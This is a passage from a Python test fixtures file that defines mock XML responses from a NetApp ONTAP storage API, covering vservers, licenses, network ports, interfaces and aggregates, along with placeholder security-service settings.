'max-throughput': QOS_MAX_THROUGHPUT,
'num-workloads': 1,
}
NO_RECORDS_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
</results>
""")
PASSED_RESPONSE = etree.XML("""
<results status="passed" />
""")
PASSED_FAILED_ITER_RESPONSE = etree.XML("""
<results status="passed">
<num-failed>0</num-failed>
<num-succeeded>1</num-succeeded>
</results>
""")
INVALID_GET_ITER_RESPONSE_NO_ATTRIBUTES = etree.XML("""
<results status="passed">
<num-records>1</num-records>
<next-tag>fake_tag</next-tag>
</results>
""")
INVALID_GET_ITER_RESPONSE_NO_RECORDS = etree.XML("""
<results status="passed">
<attributes-list/>
<next-tag>fake_tag</next-tag>
</results>
""")
VSERVER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'fake_vserver': VSERVER_NAME})
VSERVER_GET_ROOT_VOLUME_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<root-volume>%(root_volume)s</root-volume>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'root_volume': ROOT_VOLUME_NAME, 'fake_vserver': VSERVER_NAME})
VSERVER_GET_IPSPACE_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<ipspace>%(ipspace)s</ipspace>
<vserver-name>%(fake_vserver)s</vserver-name>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'ipspace': IPSPACE_NAME, 'fake_vserver': VSERVER_NAME})
VSERVER_GET_RESPONSE = etree.XML("""
<results status="passed">
<attributes>
<vserver-info>
<aggr-list>
<aggr-name>%(aggr1)s</aggr-name>
<aggr-name>%(aggr2)s</aggr-name>
</aggr-list>
<vserver-aggr-info-list>
<vserver-aggr-info>
<aggr-availsize>45678592</aggr-availsize>
<aggr-name>%(aggr1)s</aggr-name>
</vserver-aggr-info>
<vserver-aggr-info>
<aggr-availsize>6448431104</aggr-availsize>
<aggr-name>%(aggr2)s</aggr-name>
</vserver-aggr-info>
</vserver-aggr-info-list>
<vserver-name>%(vserver)s</vserver-name>
</vserver-info>
</attributes>
</results>
""" % {
'vserver': VSERVER_NAME,
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
VSERVER_DATA_LIST_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-info>
<vserver-name>%(vserver)s</vserver-name>
<vserver-type>data</vserver-type>
</vserver-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'vserver': VSERVER_NAME})
VSERVER_AGGREGATES = {
SHARE_AGGREGATE_NAMES[0]: {
'available': 45678592,
},
SHARE_AGGREGATE_NAMES[1]: {
'available': 6448431104,
},
}
VSERVER_GET_RESPONSE_NO_AGGREGATES = etree.XML("""
<results status="passed">
<attributes>
<vserver-info>
<vserver-name>%(vserver)s</vserver-name>
</vserver-info>
</attributes>
</results>
""" % {'vserver': VSERVER_NAME})
ONTAPI_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<major-version>1</major-version>
<minor-version>19</minor-version>
</results>
""")
SYSTEM_GET_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<build-timestamp>1395426307</build-timestamp>
<is-clustered>true</is-clustered>
<version>%(version)s</version>
<version-tuple>
<system-version-tuple>
<generation>8</generation>
<major>2</major>
<minor>1</minor>
</system-version-tuple>
</version-tuple>
</results>
""" % {'version': VERSION})
LICENSE_V2_LIST_INFO_RESPONSE = etree.XML("""
<results status="passed">
<licenses>
<license-v2-info>
<customer-id>none</customer-id>
<description>Cluster Base License</description>
<legacy>false</legacy>
<owner>cluster3</owner>
<package>base</package>
<serial-number>1-80-000008</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>NFS License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>nfs</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>CIFS License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>cifs</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>iSCSI License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>iscsi</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>FCP License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>fcp</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapRestore License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snaprestore</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapMirror License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snapmirror</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>FlexClone License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>flexclone</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
<license-v2-info>
<customer-id>none</customer-id>
<description>SnapVault License</description>
<legacy>false</legacy>
<owner>cluster3-01</owner>
<package>snapvault</package>
<serial-number>1-81-0000000000000004082368507</serial-number>
<type>license</type>
</license-v2-info>
</licenses>
</results>
""")
LICENSES = (
'base', 'cifs', 'fcp', 'flexclone', 'iscsi', 'nfs', 'snapmirror',
'snaprestore', 'snapvault'
)
VOLUME_COUNT_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>vol0</name>
<owning-vserver-name>cluster3-01</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(root_volume)s</name>
<owning-vserver-name>%(fake_vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {'root_volume': ROOT_VOLUME_NAME, 'fake_vserver': VSERVER_NAME})
CIFS_SECURITY_SERVICE = {
'type': 'active_directory',
'password': 'fake_password',
'user': 'fake_user',
'domain': 'fake_domain',
'dns_ip': 'fake_dns_ip',
}
LDAP_SECURITY_SERVICE = {
'type': 'ldap',
'password': 'fake_password',
'server': 'fake_server',
'id': 'fake_id',
}
KERBEROS_SECURITY_SERVICE = {
'type': 'kerberos',
'password': 'fake_password',
'user': 'fake_user',
'server': 'fake_server',
'id': 'fake_id',
'domain': 'fake_domain',
'dns_ip': 'fake_dns_ip',
}
KERBEROS_SERVICE_PRINCIPAL_NAME = 'nfs/fake-vserver.fake_domain@FAKE_DOMAIN'
INVALID_SECURITY_SERVICE = {
'type': 'fake',
}
SYSTEM_NODE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<node-details-info>
<node>%s</node>
</node-details-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % NODE_NAME)
SECUTITY_KEY_MANAGER_NVE_SUPPORT_RESPONSE_TRUE = etree.XML("""
<results status="passed">
<vol-encryption-supported>true</vol-encryption-supported>
</results>
""")
SECUTITY_KEY_MANAGER_NVE_SUPPORT_RESPONSE_FALSE = etree.XML("""
<results status="passed">
<vol-encryption-supported>false</vol-encryption-supported>
</results>
""")
NET_PORT_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:d9</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>10</operational-speed>
<port>e0a</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:e3</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>100</operational-speed>
<port>e0b</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:ed</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>1000</operational-speed>
<port>e0c</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
<net-port-info>
<administrative-duplex>full</administrative-duplex>
<administrative-flowcontrol>full</administrative-flowcontrol>
<administrative-speed>auto</administrative-speed>
<is-administrative-auto-negotiate>true</is-administrative-auto-negotiate>
<is-administrative-up>true</is-administrative-up>
<is-operational-auto-negotiate>true</is-operational-auto-negotiate>
<link-status>up</link-status>
<mac-address>00:0c:29:fc:04:f7</mac-address>
<mtu>1500</mtu>
<node>%(node_name)s</node>
<operational-duplex>full</operational-duplex>
<operational-flowcontrol>none</operational-flowcontrol>
<operational-speed>10000</operational-speed>
<port>e0d</port>
<port-type>physical</port-type>
<role>data</role>
</net-port-info>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {'node_name': NODE_NAME})
SPEED_SORTED_PORTS = (
{'node': NODE_NAME, 'port': 'e0d', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'e0c', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'e0b', 'speed': '100'},
{'node': NODE_NAME, 'port': 'e0a', 'speed': '10'},
)
PORT_NAMES = ('e0a', 'e0b', 'e0c', 'e0d')
SPEED_SORTED_PORT_NAMES = ('e0d', 'e0c', 'e0b', 'e0a')
UNSORTED_PORTS_ALL_SPEEDS = (
{'node': NODE_NAME, 'port': 'port6', 'speed': 'undef'},
{'node': NODE_NAME, 'port': 'port3', 'speed': '100'},
{'node': NODE_NAME, 'port': 'port1', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'port4', 'speed': '10'},
{'node': NODE_NAME, 'port': 'port7'},
{'node': NODE_NAME, 'port': 'port2', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'port5', 'speed': 'auto'},
)
SORTED_PORTS_ALL_SPEEDS = (
{'node': NODE_NAME, 'port': 'port1', 'speed': '10000'},
{'node': NODE_NAME, 'port': 'port2', 'speed': '1000'},
{'node': NODE_NAME, 'port': 'port3', 'speed': '100'},
{'node': NODE_NAME, 'port': 'port4', 'speed': '10'},
{'node': NODE_NAME, 'port': 'port5', 'speed': 'auto'},
{'node': NODE_NAME, 'port': 'port6', 'speed': 'undef'},
{'node': NODE_NAME, 'port': 'port7'},
)
NET_PORT_GET_ITER_BROADCAST_DOMAIN_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<ipspace>%(ipspace)s</ipspace>
<broadcast-domain>%(domain)s</broadcast-domain>
<node>%(node)s</node>
<port>%(port)s</port>
</net-port-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'domain': BROADCAST_DOMAIN,
'node': NODE_NAME,
'port': PORT,
'ipspace': IPSPACE_NAME,
})
NET_PORT_GET_ITER_BROADCAST_DOMAIN_MISSING_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-info>
<ipspace>%(ipspace)s</ipspace>
<node>%(node)s</node>
<port>%(port)s</port>
</net-port-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'node': NODE_NAME, 'port': PORT, 'ipspace': IPSPACE_NAME})
NET_PORT_BROADCAST_DOMAIN_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-port-broadcast-domain-info>
<broadcast-domain>%(domain)s</broadcast-domain>
<ipspace>%(ipspace)s</ipspace>
</net-port-broadcast-domain-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'domain': BROADCAST_DOMAIN, 'ipspace': IPSPACE_NAME})
NET_IPSPACES_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-ipspaces-info>
<broadcast-domains>
<broadcast-domain-name>OpenStack</broadcast-domain-name>
</broadcast-domains>
<id>fake_id</id>
<ipspace>%(ipspace)s</ipspace>
<ports>
<net-qualified-port-name>%(node)s:%(port)s</net-qualified-port-name>
</ports>
<uuid>fake_uuid</uuid>
<vservers>
<vserver-name>%(ipspace)s</vserver-name>
<vserver-name>%(vserver)s</vserver-name>
</vservers>
</net-ipspaces-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'ipspace': IPSPACE_NAME,
'node': NODE_NAME,
'port': VLAN_PORT,
'vserver': VSERVER_NAME
})
NET_INTERFACE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<address>192.168.228.42</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>e0c</current-port>
<data-protocols>
<data-protocol>none</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>disabled</failover-policy>
<firewall-policy>mgmt</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>e0c</home-port>
<interface-name>cluster_mgmt</interface-name>
<is-auto-revert>true</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>d3230112-7524-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>cluster_mgmt</role>
<routing-group-name>c192.168.228.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>cluster3</vserver>
</net-interface-info>
<net-interface-info>
<address>192.168.228.43</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>e0d</current-port>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>mgmt</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>e0d</home-port>
<interface-name>mgmt1</interface-name>
<is-auto-revert>true</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>0ccc57cc-7525-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>node_mgmt</role>
<routing-group-name>n192.168.228.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>cluster3-01</vserver>
</net-interface-info>
<net-interface-info>
<address>%(address)s</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>%(vlan)s</current-port>
<data-protocols>
<data-protocol>nfs</data-protocol>
<data-protocol>cifs</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>data</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>%(vlan)s</home-port>
<interface-name>%(lif)s</interface-name>
<is-auto-revert>false</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>db4d91b6-95d9-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>data</role>
<routing-group-name>d10.0.0.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>3</num-records>
</results>
""" % {
'lif': LIF_NAME,
'vserver': VSERVER_NAME,
'node': NODE_NAME,
'address': IP_ADDRESS,
'netmask': NETMASK,
'vlan': VLAN_PORT,
})
LIF_NAMES = ('cluster_mgmt', 'mgmt1', LIF_NAME)
NET_INTERFACE_GET_ITER_RESPONSE_NFS = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<address>%(address)s</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>%(vlan)s</current-port>
<data-protocols>
<data-protocol>nfs</data-protocol>
<data-protocol>cifs</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>data</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>%(vlan)s</home-port>
<interface-name>%(lif)s</interface-name>
<is-auto-revert>false</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>db4d91b6-95d9-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>data</role>
<routing-group-name>d10.0.0.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'lif': LIF_NAME,
'vserver': VSERVER_NAME,
'node': NODE_NAME,
'address': IP_ADDRESS,
'netmask': NETMASK,
'vlan': VLAN_PORT,
})
LIFS = (
{'address': '192.168.228.42',
'home-node': NODE_NAME,
'home-port': 'e0c',
'interface-name': 'cluster_mgmt',
'netmask': NETMASK,
'role': 'cluster_mgmt',
'vserver': 'cluster3'
},
{'address': '192.168.228.43',
'home-node': NODE_NAME,
'home-port': 'e0d',
'interface-name': 'mgmt1',
'netmask': NETMASK,
'role': 'node_mgmt',
'vserver': 'cluster3-01'
},
{'address': IP_ADDRESS,
'home-node': NODE_NAME,
'home-port': VLAN_PORT,
'interface-name': LIF_NAME,
'netmask': NETMASK,
'role': 'data',
'vserver': VSERVER_NAME,
},
)
NFS_LIFS = [
{'address': IP_ADDRESS,
'home-node': NODE_NAME,
'home-port': VLAN_PORT,
'interface-name': LIF_NAME,
'netmask': NETMASK,
'role': 'data',
'vserver': VSERVER_NAME,
},
]
NET_INTERFACE_GET_ONE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<interface-name>%(lif)s</interface-name>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'lif': LIF_NAME, 'vserver': VSERVER_NAME})
AGGR_GET_NAMES_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(root1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(root2)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'root1': ROOT_AGGREGATE_NAMES[0],
'root2': ROOT_AGGREGATE_NAMES[1],
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_SPACE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr1)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
</aggr-raid-attributes>
<aggr-space-attributes>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
</aggr-space-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr2)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
</aggr-raid-attributes>
<aggr-space-attributes>
<size-available>4267659264</size-available>
<size-total>7549747200</size-total>
<size-used>3282087936</size-used>
</aggr-space-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_NODE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-ownership-attributes>
<home-name>%(node)s</home-name>
</aggr-ownership-attributes>
<aggregate-name>%(aggr)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'node': NODE_NAME
})
AGGR_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>1758646411</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>512</files-private-used>
<files-total>30384</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>30384</inodefile-private-capacity>
<inodefile-public-capacity>30384</inodefile-public-capacity>
<maxfiles-available>30384</maxfiles-available>
<maxfiles-possible>243191</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>3</disk-count>
<ha-policy>cfo</ha-policy>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr1)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>16</raid-size>
<raid-status>raid_dp, normal</raid-status>
<raid-type>raid_dp</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>245760</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>95</percent-used-capacity>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>898048000</used-including-snapshot-reserve>
<volume-footprints>897802240</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>1</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
<aggregate-uuid>15863632-ea49-49a8-9c88-2bd2d57c6d7a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>unknown</striping-type>
</aggr-attributes>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>706602229</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>528</files-private-used>
<files-total>31142</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>31142</inodefile-private-capacity>
<inodefile-public-capacity>31142</inodefile-public-capacity>
<maxfiles-available>31142</maxfiles-available>
<maxfiles-possible>1945584</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>10</disk-count>
<ha-policy>sfo</ha-policy>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr2)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>8</raid-size>
<raid-status>raid4, normal</raid-status>
<raid-type>raid4</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
